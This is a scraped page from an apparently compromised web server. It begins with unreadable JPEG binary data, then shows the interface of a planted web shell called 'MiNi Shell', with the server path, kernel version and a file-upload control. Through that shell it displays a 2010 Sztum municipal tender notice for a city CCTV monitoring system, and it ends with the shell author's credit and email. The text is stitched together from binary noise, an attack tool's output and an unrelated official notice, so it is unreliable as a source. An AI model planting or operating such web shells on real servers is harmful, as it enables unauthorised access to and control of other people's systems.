JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/210384-N-2010.html

<p class="kh_header"><b>Sztum: Budowa monitoringu wizyjnego dla centrum  miasta Sztum 
oraz bulwaru nad Jeziorem Sztumskim w Sztumie</b><br>
<b>Numer ogłoszenia: 210384 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Sztum , ul. Mickiewicza 39, 82-400 Sztum, woj. pomorskie, tel. 055 6406303, faks 055 6406300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sztum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa monitoringu wizyjnego dla centrum  miasta Sztum 
oraz bulwaru nad Jeziorem Sztumskim w Sztumie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. Opis przedmiotu zamówienia

 Budowa monitoringu wizyjnego dla centrum  miasta Sztum oraz bulwaru nad Jeziorem Sztumskim w Sztumie   obejmuje wykonanie następujących robót :

1. monitoring wizyjny centrum Sztumu obejmuje: 
budowę sieci bezprzewodowej obejmującej centrum miasta składającą się z dwóch stacji bazowych połączonych radioliniami z centrum monitoringu, budowę siedmiu punktów kamerowych  z czego dwóch mobilnych oraz organizacji centrum monitoringu wizyjnego w Powiatowej Komendzie Policji. 
System radiowej transmisji sygnałów oparty jest na standardzie sieci bezprzewodowych 802.11a i pracuje na częstotliwościach z zakresu 5,150 - 5,350 GHz oraz 5,470 -5,725 GHz.
Zakres robót obejmuje:
a)	organizację / wyposażenie centrum monitoringu wizyjnego w KPP,
b)	budowę : antenowego masztu kratownicowego o wysokości 24 m,
c)	budowę : antenowego masztu kratownicowego o wysokości 12 m,
d)	budowę : antenowego masztu kratownicowego o wysokości   3 m,
e)	wykonanie / wyposażenie 7 punktów kamerowych,
f)	budowę stacji  bazowych,
g)	budowę radiolinii
wg PROJEKTU MONITORINGU   MIASTA SZTUM- RETIS Tomasz Drążkowski 

2. monitoring dla modernizowanej części bulwaru 
Budowę kanalizacji teletechnicznej nad J.Sztumskim wraz z wykonaniem 8 punktów kamerowych - kamery zamontowane na słupach oświetleniowych - monitorujących obszar bulwaru nad J.Sztumskim, a także budowę radiowego systemu transmisji sygnałów umożliwiającego łączność pomiędzy serwerem rejestrującym sygnał wideo z centrum  monitoringu wizyjnego , umiejscowionego w Powiatowej Komendzie Policji.
Do wykonanej kanalizacji teletechnicznej wprowadzić kable światłowodowe wraz z kablem zasilającym .
Dla potrzeb monitoringu wizyjnego jako infrastrukturę towarzyszącą należy ustawić (na działce nr 440/1 przy Szkole Podstawowej w Sztumie przy ul. Reja 13) szafę dostępową , w której należy umieścić serwer rejestrujący sygnał wideo.
System radiowy składa się z radiolinii typu punk - punkt. Radiowy system transmisji sygnałów oparty jest na standardzie sieci bezprzewodowych 802.11a i pracuje na częstotliwościach z zakresu 5,150 - 5,350 GHz oraz 5,470 -5,725 GHz.
Zakres robót obejmuje:
a)	organizację / wyposażenie centrum monitoringu wizyjnego w KPP,
b)	budowę szafy dostępowej oraz jej wyposażenie,
c)	wykonanie / wyposażenie 8 punków kamerowych,
d)	budowę kanalizacji teletechnicznej  
e)	budowę kanalizacji wtórnej HDPE 
f)	budowę kabla OTK12(2x6)  
g)	budowę kabla OTK8 (2x4)  
h)	budowę kabla OTK4 (1x4)  
i)	budowę radiolinii.
Wg PROJEKTU MONITORINGU BULWARU NAD J.SZTUMSKIM W SZTUMIE  - RETIS Tomasz Drążkowski 

3. monitoring terenu rekreacyjnego w ramach bulwaru nad J.Sztumskim
Budowa monitoringu wizyjnego obejmuje swym zakresem :
a)	budowę /wyposażenie  5 punktów kamerowych  monitorujących zamontowanych na słupach oświetleniowych 
b)	budowa łączy transmisyjnych (łącza pomiędzy punktami kamerowymi a węzłem koncentratora  z  kabli UTP żelowanych ułożonych w rurociągach kablowych. 
c)	budowa kabla z rur RHDPE  32 mm ułożone w ziemi łącznie z kablami zasilającymi słupy podczas budowy oświetlenia terenu (którego realizacja jest objęta odrębnym postępowaniem przetargowym)
d)	węzeł koncentratora
e)	łącze radiowe A pomiędzy węzłem koncentratora a Urzędem Miasta 
f)	łącze radiowe B pomiędzy Urzędem Miasta a Centrum Monitoringu
g)	wyposażenie centrum monitoringu

Wg PROJEKTU MONITORINGU WIZYJNEGO TERENU ( ZAGOSPODAROWANIE TERENU W RAMACH BULWARU NAD J.SZTUMSKIM)- PSBUD mgr inż. Piotr Świrzyński  

4. Uwaga! Budowa obejmuje wykonanie i wyposażenie wspólnego Centrum monitoringu wizyjnego w Komendzie Powiatowej Policji , które obejmuje obszar centrum miasta i obszar bulwaru nad J.Sztumskim oraz terenu rekreacyjnego w ramach bulwaru nad J.Sztumskim .

5.  Zakończenie budowy systemu monitoringu wizyjnego zakończy się:
a)  przetestowaniem poszczególnych elementów składowych
b)oceną zgodności zastosowanych urządzeń z projektem i prawidłowości ich montażu
c)oceną czy sceny obserwowane przez kamery odpowiadają założeniom koncepcyjnym 
d)oceną czy sygnał wizyjny jest zgodny z normami telewizji dozorowej i odpowiednimi przepisami dot. warunków rozpoznania i identyfikacji osób.
e)przeszkoleniem obsługi i przekazaniem co najmniej trzech kompletów instrukcji administrowania i obsługi systemu.
f) sporządzeniem protokółu końcowego robót. 

6. Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji projektowej - dokumentacja budowlana  wraz ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych.
7. Zamawiający zastrzega, aby zastosowane do budowy materiały posiadały ważne aprobaty techniczne lub deklaracje zgodności, certyfikaty bezpieczeństwa i atesty higieniczne. Zamawiający dopuszcza przy realizacji zamówienia zastosowanie urządzeń i materiałów                             równoważnych lub lepszych co do jakości, parametrów technicznych i surowców użytych do ich wykonania, w stosunku do  materiałów i urządzeń określonych w dokumentacji projektowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.23.00-5, 45.23.23.30-4, 32.56.23.00-3, 35.12.53.00-7, 45.31.00.00-3, 32.32.35.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 20.000,00 złotych.
 (Słownie złotych: dwadzieścia  tysięcy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 
a)Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 1 roboty polegającej na wykonaniu  systemu monitoringu miasta polegającej na budowie radiowego systemu transmisji sygnałów umożliwiającego łączność pomiędzy serwerem rejestrującym sygnał wideo z centrum  monitoringu wizyjnego w sieci bezprzewodowej z minimum 5 punktami kamerowymi wraz z centrum monitoringu
b)Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 1 roboty polegającej na   budowie systemu monitoringu miast w technologii przesyłu sygnałów światłowodami  z minimum 5 punktami kamerowymi wraz z centrum monitoringu
c)Warunki określone wyżej mogą być spełnione łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę że dysponuje lub będzie dysponować następującymi osobami:
a) kierownikiem budowy, posiadającym uprawnienia do kierowania robotami budowlanymi w specjalnościach instalacyjnych w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą  bez ograniczeń zakresie 
b) przynajmniej jedną osobą, posiadającą uprawnienia do kierowania robotami budowlanymi specjalności konstrukcyjno- budowlanej bez ograniczeń zgodnie z Polskim Prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c) przynajmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych

Uwaga: Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz. U z 2006r nr 156,poz.1118 ze zm) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2008r nr 63, poz. 394)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznany zostanie za spełniony wówczas gdy Wykonawca przedstawi:
    a) informację z banku lub spółdzielczej kasy oszczędnościowo- kredytowej, w których Wykonawca posiada rachunek bankowy potwierdzający wysokość środków finansowych lub zdolność kredytową Wykonawcy nie mniejszą niż 200.000,00 zł (słownie złotych: dwieście tysięcy), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
b) opłaconą polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie mniejszej niż 100.000,00 zł (słownie złotych: sto tysięcy )</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę
A.2) Formularz cenowy - wypełniony i podpisany przez Wykonawcę
A.3) Wykaz osób do kontaktów z Zamawiającym
A.4) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień 
         publicznych.
A.5) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia 
art. 24 ust. 1 Prawa zamówień publicznych
A.6) Wzór umowy  - parafowany przez wykonawcę    
A.7) Harmonogram terminowo-finansowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający dopuszcza  możliwość zmiany umowy o zamówienie publiczne w następującym 
    zakresie  :    
2.1	Co do terminów   wykonania i odbioru robót oraz zasad wypłaty wynagrodzenia Wykonawcy  , w następujących przypadkach:
a) z powodu działania siły wyższej uniemożliwiającej zachowanie terminu wykonania 
           prac,
       b) z powodu ujawnienia się wad projektowych powodujących wstrzymanie prac do czasu 
           ich usunięcia, 
       c) z powodu konieczności wykonania zamówień dodatkowych lub zamiennych, których nie 
            można było przewidzieć w chwili zawarcia umowy lub z powodu  trudności w koordynacji  prac z firmami realizującymi inne zadania na tym samym terenie,
       d) z powodu zmian prawa o charakterze bezwzględnie obowiązującym
            - powodujących konieczność wydłużenia procesu budowlanego (dodatkowe 
              czynności prawne i faktyczne nakazane prawem nie występujące w dacie zawarcia 
              umowy, chyba, że ww zmiany prawa winny być znane stronom w sytuacji 
              odłożonego ich wejścia w życie - vacatio legis,
            - dotyczących zasad rozliczeń stron umowy, zapisy w ust. 2.1 lit. a - d , nie dotyczą zmiany 
               wysokości  wynagrodzenia ryczałtowego.
         e) z powodu zmniejszenia zakresu robót budowlanych objętych umową - w tym 
             przypadku ulega zmniejszeniu wynagrodzenie ryczałtowe.
2.2	Co do zakresu robót objętych umową i wysokości wynagrodzenia w przypadku, gdy ich      
wykonanie w całości lub części stanie się zbędne Zamawiającemu z jakiegokolwiek 
      powodu albo stan wypłacalności Zamawiającego spowoduje konieczność ich 
      zaniechania.
2.3	Co do oznaczenia stron, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo 
zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia 
      strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących 
      taką zmianę.
2.4	Co do osób reprezentujących strony w procesie budowlanym ( kierownik budowy, 
kierownik robót, inspektor nadzoru, art.).

    2.5   Co do wysokości wynagrodzenia w przypadku zastosowania zamiennych rozwiązań 
       technologicznych tańszych lub droższych przez obniżenie lub podwyższenie 
       wynagrodzenia ryczałtowego.
3. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem     
    obowiązków wynikających z obowiązującego prawa, w tym w szczególności art.140 ust.3 
 Prawa zamówień publicznych oraz zasad ogólnych rządzących tą ustawą,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sztum.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto i Gmina Sztum
ul. Mickiewicza 39
82-400 Sztum
www.sztum.pl
e-mail : sztum@sztum.pl 
godziny urzędowania: poniedziałek - piątek 7.30 - 15.30
tel. 055 640 63 03
fax 055 640 63 00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2010 godzina 12:00, miejsce: w siedzibie lub na adres zamawiającego : 
Urząd Miasta i Gminy w Sztumie
ul. Mickiewicza 39 82-400 Sztum
Pokój : Informacja Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja realizowana jest w ramach Projektów
1. Podniesienie atrakcyjności Szlaku Zamków Gotyckich na Powiślu - rewitalizacja i zagospodarowanie głównych przestrzeni publicznych w Sztumie z przywróceniem historycznego charakteru centrum Sztumu w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 , Osi Priorytetowej8.Działania 8.1Lokalny potencjał rozwojowy 
Numer projektu: WND-RPPM-08.01.02-00-015/09
2.Podniesienie atrakcyjności turystycznej Szlaku Zamków Gotyckich na Powiślu - budowa trasy rowerowej łączącej zamek w Malborku z atrakcjami turystycznymi powiatów malborskiego, sztumskiego, kwidzyńskiego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 , Osi Priorytetowej6.Działania 6.1 Infrastruktura wzmacniająca potencjał turystyczny 
Numer projektu: WND-RPPM-06.01.00-00-006/08.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com